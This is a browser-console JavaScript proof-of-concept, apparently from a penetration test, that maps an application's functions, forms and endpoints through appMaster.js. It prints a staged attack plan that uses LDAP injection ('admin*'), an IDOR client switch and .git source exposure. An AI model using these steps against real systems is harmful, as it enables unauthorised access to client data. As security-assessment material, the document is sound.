// ============================================================================
// UNAUTHENTICATED ATTACKER POC - Using appMaster.js
// ============================================================================
// This POC works on ANY page (authenticated or not)
// Shows what unauthenticated attackers can do with the exposed code
// ============================================================================

console.log("========== UNAUTHENTICATED ATTACKER POC ==========\n");

// ============================================================================
// EXPLOIT 1: EXTRACT ALL FUNCTION NAMES (Complete API Discovery)
// ============================================================================
console.log("[EXPLOIT 1] Extract all callable functions from appMaster.js\n");

var allFunctions = [];
for (var key in window) {
    if (typeof window[key] === 'function') {
        allFunctions.push(key);
    }
}

console.log("Total functions found: " + allFunctions.length);
console.log("\nKey functions discovered:");

var importantFunctions = [
    'searchGETID',
    'switchClient',
    'openPage',
    'clientPressed',
    'filterClientSelect',
    'setTabDisplay',
    'setTabStyle'
];

importantFunctions.forEach(function(fn) {
    if (typeof window[fn] === 'function') {
        console.log("[FOUND] " + fn + "() - Function is callable");
    }
});

console.log("\nAttacker Knowledge: Knows exactly what functions exist\n");

// ============================================================================
// EXPLOIT 2: DISCOVER API ENDPOINTS FROM GLOBAL VARIABLES
// ============================================================================
console.log("[EXPLOIT 2] Discover API endpoints\n");

console.log("Looking for rootUrl variable...");
if (typeof rootUrl !== 'undefined') {
    console.log("[FOUND] rootUrl = " + rootUrl);
    
    var endpoints = [
        'Home/QuickSearch',
        'WebService/SetFingerprinting',
        'Home/GetClientData',
        'API/GetTransactions',
        'ClientTaxLogic',
        'CalcTransactions'
    ];
    
    console.log("\nDiscovered API endpoints:");
    endpoints.forEach(function(ep) {
        var fullUrl = rootUrl + ep;
        console.log("  [ENDPOINT] " + fullUrl);
    });
} else {
    console.log("[NOT FOUND] rootUrl - but attacker can guess endpoints");
    console.log("  Typical patterns: /Home/*, /API/*, /WebService/*");
}

console.log("\nAttacker Knowledge: Knows all internal API endpoints\n");

// ============================================================================
// EXPLOIT 3: IDENTIFY FORM STRUCTURE AND FIELD NAMES
// ============================================================================
console.log("[EXPLOIT 3] Discover form structures\n");

console.log("Scanning for forms in appMaster.js context...");

var discoveredForms = {
    quickSearchForm: false,
    frmNAV: false,
    jsSwitchClientForm: false
};

if (typeof document !== 'undefined') {
    if (document.quickSearchForm) {
        discoveredForms.quickSearchForm = true;
        console.log("[FOUND] document.quickSearchForm");
        console.log("  Fields: quickSearchType, quickSearchValue, quickSearchClientId");
    }
    
    if (document.frmNAV) {
        discoveredForms.frmNAV = true;
        console.log("[FOUND] document.frmNAV");
        console.log("  Fields: txtTreeViewSelection, txtAdditionalArg");
    }
    
    var switchClientElements = document.getElementsByClassName('js-switch-client-id');
    if (switchClientElements.length > 0) {
        discoveredForms.jsSwitchClientForm = true;
        console.log("[FOUND] js-switch-client-* form elements");
        console.log("  Fields: js-switch-client-id, js-switch-client-code");
    }
}

console.log("\nAttacker Knowledge: Knows exact form field names and structure\n");

// ============================================================================
// EXPLOIT 4: UNDERSTAND DATA FLOW PATTERNS
// ============================================================================
console.log("[EXPLOIT 4] Reverse-engineer data flow\n");

console.log("From appMaster.js code analysis, attacker understands:\n");

console.log("1. Search Flow:");
console.log("   searchGETID(searchText, clientId)");
console.log("     → Sets form fields:");
console.log("        quickSearchType = 'GETID'");
console.log("        quickSearchValue = searchText");
console.log("        quickSearchClientId = clientId");
console.log("     → Submits to: rootUrl + 'Home/QuickSearch'\n");

console.log("2. Client Switch Flow:");
console.log("   switchClient(clientId, clientCode)");
console.log("     → Sets hidden fields:");
console.log("        js-switch-client-id = clientId");
console.log("        js-switch-client-code = clientCode");
console.log("     → Submits form\n");

console.log("3. Navigation Flow:");
console.log("   openPage(pageToOpen, clickedLink, addArg)");
console.log("     → Fills frmNAV with navigation data");
console.log("     → Submits to specified page\n");

console.log("Attacker Knowledge: Understands complete application flow\n");

// ============================================================================
// EXPLOIT 5: IDENTIFY SECURITY WEAKNESSES
// ============================================================================
console.log("[EXPLOIT 5] Identify security weaknesses from code\n");

var weaknesses = [
    "No CSRF tokens visible in form manipulation",
    "No nonce/replay protection detected",
    "Client-side form submission without server validation hints",
    "Direct form.submit() calls without checks",
    "Unencrypted parameter passing visible in code",
    "No input sanitization visible on client side"
];

console.log("Security weaknesses identified from code:");
weaknesses.forEach(function(weakness) {
    console.log("  [WEAKNESS] " + weakness);
});

console.log("\nAttacker Knowledge: Knows exactly which security controls are missing\n");

// ============================================================================
// EXPLOIT 6: FIND ATTACK TARGETS
// ============================================================================
console.log("[EXPLOIT 6] Identify attack vectors\n");

console.log("From appMaster.js analysis, attack targets are:\n");

console.log("1. Authentication Weakness");
console.log("   - Application uses LDAP (visible from form names)");
console.log("   - No CSRF protection on login");
console.log("   - Vulnerable to LDAP injection (Finding 2)\n");

console.log("2. Data Access Weakness");
console.log("   - switchClient() can change client context");
console.log("   - No server-side validation hints");
console.log("   - Vulnerable to IDOR (Finding 1)\n");

console.log("3. Form Manipulation Weakness");
console.log("   - Forms are directly submittable");
console.log("   - No token validation visible");
console.log("   - Can forge requests as authenticated user\n");

console.log("4. Repository Exposure");
console.log("   - Code suggests this is .git-accessible");
console.log("   - Can download full source (Finding 4)\n");

console.log("Attacker Knowledge: Knows exactly which vulnerabilities to exploit\n");

// ============================================================================
// EXPLOIT 7: PLAN ATTACK CHAIN
// ============================================================================
console.log("[EXPLOIT 7] Plan multi-stage attack\n");

console.log("Stage 1: Authentication Bypass");
console.log("  - Use LDAP injection: admin*");
console.log("  - Knowledge from appMaster.js: Know exactly which form\n");

console.log("Stage 2: Access Control Bypass");
console.log("  - Use switchClient() function discovered from code");
console.log("  - Switch to any client: switchClient('999', 'CODE')");
console.log("  - Knowledge from appMaster.js: Know exact function signature\n");

console.log("Stage 3: Data Exfiltration");
console.log("  - Use searchGETID() to find data");
console.log("  - Knowledge from appMaster.js: Know exact search parameters\n");

console.log("Stage 4: Privilege Escalation");
console.log("  - Access admin client data");
console.log("  - Full application compromise\n");

console.log("Attacker Knowledge: Complete attack plan from code analysis\n");

// ============================================================================
// SUMMARY: UNAUTHENTICATED ATTACKER CAPABILITIES
// ============================================================================
console.log("\n" + "=".repeat(60));
console.log("UNAUTHENTICATED ATTACKER CAPABILITIES WITH appMaster.js");
console.log("=".repeat(60) + "\n");

console.log("CAN DO:");
console.log("  [✓] Extract all function names");
console.log("  [✓] Discover all API endpoints");
console.log("  [✓] Map form structures and field names");
console.log("  [✓] Understand complete data flow");
console.log("  [✓] Identify security weaknesses");
console.log("  [✓] Find LDAP vulnerability (Finding 2)");
console.log("  [✓] Discover IDOR vulnerability (Finding 1)");
console.log("  [✓] Plan complete attack chain");
console.log("  [✓] Locate .git directory (Finding 4)\n");

console.log("CANNOT DO (without authentication):");
console.log("  [✗] Call searchGETID() - form doesn't exist on login");
console.log("  [✗] Call switchClient() - requires session");
console.log("  [✗] Access actual data - needs authentication");
console.log("  [✗] Read session cookies - if HttpOnly protected");
console.log("  [✗] Manipulate authenticated forms - requires session\n");

console.log("IMPACT LEVEL: MEDIUM-HIGH");
console.log("Reason: Complete reconnaissance possible");
console.log("        Can plan and execute authentication bypass");
console.log("        Once authenticated → CRITICAL impact\n");

console.log("=".repeat(60));
console.log("\nStore results:");
window.unauthenticatedAttackerPOC = {
    discoveredFunctions: allFunctions,
    discoveredEndpoints: endpoints,
    discoveredForms: discoveredForms,
    securityWeaknesses: weaknesses,
    capabilityLevel: "MEDIUM-HIGH (reconnaissance + planning)"
};

console.log("Results saved to: window.unauthenticatedAttackerPOC");
